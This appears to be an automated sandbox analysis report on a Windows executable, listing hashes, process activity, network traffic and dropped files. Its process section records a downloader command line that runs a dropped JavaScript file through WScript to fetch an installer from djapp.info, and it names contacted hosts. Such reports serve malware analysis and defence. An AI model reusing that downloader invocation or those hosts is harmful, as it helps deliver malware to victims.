Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/05/2024, 13:12 UTC

General

  • Target

    17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    17d5ceebf106e989b0b4cabcdb9123dc

  • SHA1

    95f7aabc5cbc6541160dcec0268dd89b3bf37099

  • SHA256

    1d21f633b5beec96b5a777690fbbb3e4f1e2f766a9282dcce967c1100e654ccc

  • SHA512

    f6cbaa4c343922aafb9499c2f58c5f399a8cfaa7d8e3a3dab96bdd3b3a0ddcb5a7c9512c1d731097a48fbbbd3fecf5a9b00e244875b90c356f95ec9dd6fb5271

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO35m:/7BSH8zUB+nGESaaRvoB7FJNndnam

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2944
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2600
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2708
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2020
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:1508

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:26 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:27 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Wed, 30-Apr-2025 13:12:27 GMT; path=/
    set-cookie: site_version=HDv3; expires=Wed, 30-Apr-2025 13:12:27 GMT; path=/
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:27 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMPHyKg2QhhJdGy%2FxUIWtgMpdWSLKi6GKxByIk9LDvS29iy2AnuUfFVv5sOYS0IXC0Wn6nYYsgdJKHGhUafHUgPut2QT0y6WiH3D%2FtKqb2IGDqffFasasq3W%2B%2BGH9jNbKfG4i48%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fb752d9f9539-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:33 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:34 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inokXRAznajwfase668SQkHokFGkMDY%2B8jHqm9XfdZ1l2Ceff9Y8GdxuYjaf%2B8oZ3jv%2FVu7sS4Zn03Es%2FD2JE9K8FrawCgA%2FyrOH2uXGRXumGqbTZxKUcV1zqH4A3DlGOmqb6d8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fb9dcc79653c-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:39 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:40 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:40 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uT1VKPjtli%2BVf9XTIsWstLQW2klhyIzZeUciNlPy0GD7hjgYZLLbIyoCk2US0mGRWC3SDJ5dbcOpsJErga21QzwXkCXg1eCW%2FvZ8e5vBzRQbPYIr37JJDM%2BQkY7b88mUFHavgIk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fbc4cbe8385e-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:45 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:46 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:46 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YDcXTkH6MrO%2Bs1dSN10NGtiSn429auOzAtxiKoGh0Qflhbfg3CARjXKYwapS3drlcprKtMMdnboGFfP9b%2FOcB%2FLYJyilH9o%2FkuEdoXFMDKFj0TK1YWLGuIiieodcd4sjDixcnI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fbeb6fa19497-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:53 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CUC4Bct%2BopNiCAk5kCIrpNSg%2Bv%2BuqJTJrIK9nRL7VzM6XaIQiBEKUGdVq5xnC10I86e%2BRKAWOe%2BGJTZoRW4rSQAxMmmCm76b6AVWvdVkXZMK1rtHWGZVAXN2BryAOG%2F5LxtaqPA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fc13bb639505-LHR
    Content-Encoding: gzip
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.5kB
    13
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    656 B
    239 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.2kB
    11
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.2kB
    12
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.1kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
    16.3kB
    15
    20

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
    113 B
    1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    172.67.70.191
    104.26.6.37
    104.26.7.37

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    ed89e34d7155c15ba34b2e8037f052fb

    SHA1

    45f90ed3c32a2e46361e9f5af26c61827dcceabd

    SHA256

    939a7f0780a999f6f67b3a64c5811946b1ee416d1b9cd4dba9d52f1d6ab787f9

    SHA512

    507c61186bc691e01fdbba126bfb6eb69d8e83027e83b50604992ebc4233d37f1e37737f264b3951486f660e0add1bfca75274808ed7bc87481ab6ce72e6c160

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    cb9ea2cbd4de3885756224f7f49adc3d

    SHA1

    d5fba5186f6f2d4d75601824ab294f1935b29b1e

    SHA256

    a5cf9fb4ac3a3520a0df020ebefcd941761b9f1680160551df438894a86a43f7

    SHA512

    db8ad00fac22bf1bf500542b5a043d2603ee204eb7c5e2769204aa8ce16dc24799446df88746eaa1d68ec221e4585d098b7b5b6e09bdf976510a01729a64e17a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    9a22f09f1e2acdb6f3076f006c42c46a

    SHA1

    70a7326f9396a9a43e5bfab33c29d119d7f53def

    SHA256

    22bcf2697cd35595cdcd4cc3181b08be96392f43028ab1de93b4f1a2f0b36651

    SHA512

    334ab5ac1b083679610ed33fc699a46f981231a7eed2cbfd9797bf624dda9bd1f4b78a0f623a42ff69c7e6695f199549934669d0d4292beade3bb1a5ffdced2f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    398080927005341e227f8f189545e304

    SHA1

    fb7ceb34d8301799e9b0640fdf20864f2a1f2237

    SHA256

    95eae0b153190a66991d7c6c58a902c21abd1a33ac1aff3acc92741654e72b4d

    SHA512

    577db8a22a59080c4f8bb28d752fa04801c18fe7340f2b8f8759c2752d13317868762125c9159bda3896f31a115c071f5f20518c08719af3d271a2bde33e1f9b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

    Filesize

    6KB

    MD5

    41cdb18ce288b8ca6ab835c100dddf4c

    SHA1

    8a75f5b6c11f075986a76f316478877c53e4d401

    SHA256

    10f02727adc3c3f1175296f1149e2cc84ebef4a010e2845e5b4fb75d37a8166e

    SHA512

    7fa3fc2040730c5dc15b50ddcf940d6d3dcd73fcf35e42812bcdf52145c14b69e751de74b8b18a3880d07e14a65f75377c4392888de701972ce7347023b410aa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

    Filesize

    6KB

    MD5

    ab657802cb2f6d3449cd2ea281e3fe22

    SHA1

    55b1104f8d62a37319e8b02f902ed52df6474499

    SHA256

    c7ec418d4335d226d451f704b7b15a62861ef5ad54d273064b76ce080e6f5239

    SHA512

    8f19ece709d4c54462777a6550f0444002203cec22a8e9d613c2928ab1e3bf3dff6890e7b6bedf6dc4e1ccc5b6b4ac530177a2d1ba2d6c6fb18a672aac8d594c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

    Filesize

    6KB

    MD5

    89e38ff0cefb93b093d5c02145a7d456

    SHA1

    28215486c89a26bb511145e95a95d4976620ec1b

    SHA256

    92f7ac5e76e636fac3804bc7a5875a7ee21d290ac7cb47b7a4c2f60bf1723b6c

    SHA512

    16b9cb4b875a6b2294702981094943ede45d7b0d82d08d27025572180908856e187c7e87c182c3bf9f251093757bc8fefd94a818c35af774405a0db85f3a90a8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

    Filesize

    6KB

    MD5

    ee637eea5e9b4c4b8298465c29841b79

    SHA1

    eda8f6569bde469ce073cb9f819f90ed57223fff

    SHA256

    fc23967651d6176e21c1b384c96b5a4400a9d7ef4a1303accb66f16ada7f2bf4

    SHA512

    1e9906bc00633d8ecc13321e830923ad1fbb72b449e637b6c1719b31a17dd1e8904cac1eedfb6b9974cc927f4ec8858fd244fabcb6070ff34c9e643f54b48f67

  • C:\Users\Admin\AppData\Local\Temp\Cab589B.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar70FC.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\fuf28E4.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HS8OTRM6.txt

    Filesize

    177B

    MD5

    950d1ffa74a7d989a73633b251d1d9f1

    SHA1

    9f5e6fb7ce325b2b7d62ffa4489b1caee2c92cce

    SHA256

    ebd370e737af01c71af95017472780b2125eb779bf930e3bd3ab733f3f105e59

    SHA512

    58f6dd1c650475aa46f9065d3fa7162b903f0226e4e6a106a7ba195b4c5a558bf110156fd704cbafa76c9cd24244f2e4bc8f581ef05d95ddb0959360334443a9
